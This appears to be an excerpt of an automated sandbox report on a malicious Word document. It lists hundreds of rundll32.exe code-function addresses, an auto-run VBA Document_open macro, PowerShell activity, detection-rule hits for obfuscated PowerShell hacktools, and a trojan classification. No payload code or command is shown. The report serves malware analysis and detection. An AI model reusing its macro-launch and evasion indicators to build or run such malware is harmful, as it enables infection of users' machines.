Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F3895	10_2_007F3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E568E	10_2_007E568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E7B63	10_2_007E7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F4B41	10_2_007F4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E8736	10_2_007E8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F63C1	10_2_007F63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F687F	10_2_007F687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F5A61	10_2_007F5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EE05A	10_2_007EE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EEA4C	10_2_007EEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EF444	10_2_007EF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E9A37	10_2_007E9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E4A35	10_2_007E4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E2A30	10_2_007E2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F7A0F	10_2_007F7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F340A	10_2_007F340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E1CFA	10_2_007E1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F26F5	10_2_007F26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E88E5	10_2_007E88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F12E2	10_2_007F12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F8ADC	10_2_007F8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E96CD	10_2_007E96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F20C5	10_2_007F20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E48BD	10_2_007E48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E80BA	10_2_007E80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E60B9	10_2_007E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007FA0AF	10_2_007FA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E62A3	10_2_007E62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F889D	10_2_007F889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E1280	10_2_007E1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E8F78	10_2_007E8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E5B79	10_2_007E5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EE377	10_2_007EE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F1773	10_2_007F1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EC769	10_2_007EC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F0B68	10_2_007F0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EB75F	10_2_007EB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E6754	10_2_007E6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F2349	10_2_007F2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F8F49	10_2_007F8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F9B45	10_2_007F9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E153C	10_2_007E153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EBB3A	10_2_007EBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EF536	10_2_007EF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F0D33	10_2_007F0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F7F1F	10_2_007F7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F5D1D	10_2_007F5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F8D1C	10_2_007F8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F511B	10_2_007F511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F2B16	10_2_007F2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EB112	10_2_007EB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F0F0C	10_2_007F0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F7D03	10_2_007F7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F71EF	10_2_007F71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007ED7EB	10_2_007ED7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F67E9	10_2_007F67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F3FE7	10_2_007F3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F31E2	10_2_007F31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F1BDF	10_2_007F1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E9FDC	10_2_007E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F6DB9	10_2_007F6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F61B8	10_2_007F61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E17AC	10_2_007E17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F73AC	10_2_007F73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E69A0	10_2_007E69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E6D9F	10_2_007E6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E839D	10_2_007E839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E7998	10_2_007E7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F878F	10_2_007F878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EF98C	10_2_007EF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F9586	10_2_007F9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038B41F	11_2_0038B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038EE78	11_2_0038EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00382C63	11_2_00382C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00393895	11_2_00393895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038568E	11_2_0038568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003942DA	11_2_003942DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003902C3	11_2_003902C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038C0C6	11_2_0038C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00388736	11_2_00388736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00387B63	11_2_00387B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00394B41	11_2_00394B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003963C1	11_2_003963C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00382A30	11_2_00382A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00384A35	11_2_00384A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00389A37	11_2_00389A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039340A	11_2_0039340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00397A0F	11_2_00397A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039687F	11_2_0039687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00395A61	11_2_00395A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038E05A	11_2_0038E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038EA4C	11_2_0038EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038F444	11_2_0038F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003860B9	11_2_003860B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003880BA	11_2_003880BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003848BD	11_2_003848BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039A0AF	11_2_0039A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003862A3	11_2_003862A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039889D	11_2_0039889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00381280	11_2_00381280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00381CFA	11_2_00381CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003926F5	11_2_003926F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003912E2	11_2_003912E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003888E5	11_2_003888E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00398ADC	11_2_00398ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003896CD	11_2_003896CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003920C5	11_2_003920C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038BB3A	11_2_0038BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038153C	11_2_0038153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00390D33	11_2_00390D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038F536	11_2_0038F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039511B	11_2_0039511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00395D1D	11_2_00395D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00398D1C	11_2_00398D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00397F1F	11_2_00397F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038B112	11_2_0038B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00392B16	11_2_00392B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00390F0C	11_2_00390F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00397D03	11_2_00397D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00388F78	11_2_00388F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00385B79	11_2_00385B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00391773	11_2_00391773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038E377	11_2_0038E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038C769	11_2_0038C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00390B68	11_2_00390B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038B75F	11_2_0038B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00386754	11_2_00386754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00392349	11_2_00392349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00398F49	11_2_00398F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00399B45	11_2_00399B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00396DB9	11_2_00396DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003961B8	11_2_003961B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003817AC	11_2_003817AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003973AC	11_2_003973AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003869A0	11_2_003869A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00387998	11_2_00387998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038839D	11_2_0038839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00386D9F	11_2_00386D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038F98C	11_2_0038F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0039878F	11_2_0039878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00399586	11_2_00399586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003967E9	11_2_003967E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0038D7EB	11_2_0038D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003971EF	11_2_003971EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003931E2	11_2_003931E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00393FE7	11_2_00393FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00389FDC	11_2_00389FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00391BDF	11_2_00391BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B41F	12_2_0022B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222C63	12_2_00222C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022EE78	12_2_0022EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022568E	12_2_0022568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00233895	12_2_00233895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002302C3	12_2_002302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C0C6	12_2_0022C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002342DA	12_2_002342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228736	12_2_00228736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227B63	12_2_00227B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00234B41	12_2_00234B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002363C1	12_2_002363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222A30	12_2_00222A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229A37	12_2_00229A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00224A35	12_2_00224A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023340A	12_2_0023340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237A0F	12_2_00237A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00235A61	12_2_00235A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023687F	12_2_0023687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F444	12_2_0022F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022EA4C	12_2_0022EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022E05A	12_2_0022E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002262A3	12_2_002262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023A0AF	12_2_0023A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002280BA	12_2_002280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002260B9	12_2_002260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002248BD	12_2_002248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221280	12_2_00221280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023889D	12_2_0023889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002312E2	12_2_002312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002288E5	12_2_002288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002326F5	12_2_002326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221CFA	12_2_00221CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002320C5	12_2_002320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002296CD	12_2_002296CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238ADC	12_2_00238ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230D33	12_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F536	12_2_0022F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022BB3A	12_2_0022BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022153C	12_2_0022153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237D03	12_2_00237D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230F0C	12_2_00230F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B112	12_2_0022B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00232B16	12_2_00232B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023511B	12_2_0023511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237F1F	12_2_00237F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00235D1D	12_2_00235D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238D1C	12_2_00238D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C769	12_2_0022C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230B68	12_2_00230B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00231773	12_2_00231773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022E377	12_2_0022E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228F78	12_2_00228F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225B79	12_2_00225B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00239B45	12_2_00239B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00232349	12_2_00232349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238F49	12_2_00238F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226754	12_2_00226754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B75F	12_2_0022B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002269A0	12_2_002269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002217AC	12_2_002217AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002373AC	12_2_002373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00236DB9	12_2_00236DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002361B8	12_2_002361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00239586	12_2_00239586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023878F	12_2_0023878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F98C	12_2_0022F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227998	12_2_00227998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226D9F	12_2_00226D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022839D	12_2_0022839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002331E2	12_2_002331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00233FE7	12_2_00233FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022D7EB	12_2_0022D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002367E9	12_2_002367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002371EF	12_2_002371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00231BDF	12_2_00231BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229FDC	12_2_00229FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020B41F	13_2_0020B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202C63	13_2_00202C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020EE78	13_2_0020EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020568E	13_2_0020568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00213895	13_2_00213895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002102C3	13_2_002102C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020C0C6	13_2_0020C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002142DA	13_2_002142DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00208736	13_2_00208736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207B63	13_2_00207B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00214B41	13_2_00214B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002163C1	13_2_002163C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202A30	13_2_00202A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00204A35	13_2_00204A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00209A37	13_2_00209A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021340A	13_2_0021340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00217A0F	13_2_00217A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00215A61	13_2_00215A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021687F	13_2_0021687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020F444	13_2_0020F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020EA4C	13_2_0020EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020E05A	13_2_0020E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002062A3	13_2_002062A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021A0AF	13_2_0021A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002060B9	13_2_002060B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002080BA	13_2_002080BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002048BD	13_2_002048BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00201280	13_2_00201280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021889D	13_2_0021889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002112E2	13_2_002112E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002088E5	13_2_002088E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002126F5	13_2_002126F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00201CFA	13_2_00201CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002120C5	13_2_002120C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002096CD	13_2_002096CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00218ADC	13_2_00218ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00210D33	13_2_00210D33

Source: Documenten_9274874 8574977265.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open			Name: Document_open

Source: Documenten_9274874 8574977265.doc

OLE indicator, VBA macros: true

Source: 00000005.00000002.2108701302.0000000001C26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2108539284.0000000000196000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: rundll32.exe, 00000006.00000002.2117217440.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111910597.0000000001DA0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@24/8@7/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_001D1C88 CreateToolhelp32Snapshot,

14_2_001D1C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$cumenten_9274874 8574977265.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD91F.tmp

Jump to behavior

Source: Documenten_9274874 8574977265.doc

OLE indicator, Word Document stream: true

Source: Documenten_9274874 8574977265.doc	OLE document summary: title field not present or empty
Source: Documenten_9274874 8574977265.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............J........................... ...............................................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............J...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......X.......L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........H.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................C.j......................J.............}..v.....]p.....0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................C.j..... J...............J.............}..v.....]p.....0.u...............H.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................C.j......................J.............}..v....pjp.....0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................C.j......H...............J.............}..v.....kp.....0.u.............8.H.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............\|C.j......................J.............}..v......q.....0.u.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............\|C.j..... J...............J.............}..v....H.q.....0.u...............H.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............,D.j....E.................J.............}..v.....8......0.u...............H.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............,D.j....E.................J.............}..v....@w......0.u...............H.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
